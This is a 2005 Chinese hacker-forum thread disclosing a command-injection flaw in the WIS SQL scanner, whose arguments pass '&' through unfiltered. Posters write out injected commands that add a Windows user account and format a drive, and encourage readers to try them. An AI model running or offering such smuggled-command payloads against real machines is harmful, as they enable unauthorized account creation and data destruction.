标题: 小榕的WIS漏洞 [打印本页]

---

作者: 千與千尋    时间: 2005-2-3 14:09     标题: 小榕的WIS漏洞

Term    : FreeXploiT
Author : ALLyeSNO
Date      : 2005-2-2
WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码
命令行下进入WIS存放目录 输入wis &net user allyesno 12345 /add 则成功执行。
------------------------------------------------------------------------------------
此漏洞利用的时候前提是wis.exe必须以系统管理员权限运行，应用在webshell等方面估计可行性不大。

　

---

作者: 风幻残林    时间: 2005-2-20 17:46     标题: 小榕的WIS漏洞

这个方法还有很多种
大家还可以依次类推
比如说: wis http://xxx.xxx.xxx/&format x:
        wis http://xxx.xxx.xxx/&net user
等等
具体的大家可以自己实践一下!  

---

作者: copyday    时间: 2005-2-20 17:59     标题: 小榕的WIS漏洞

去试试``

---

作者: 上苍的女子    时间: 2005-5-19 23:40     标题: 小榕的WIS漏洞

有用吗?

真的有用,吗?

---

欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)

Powered by Discuz! 7.2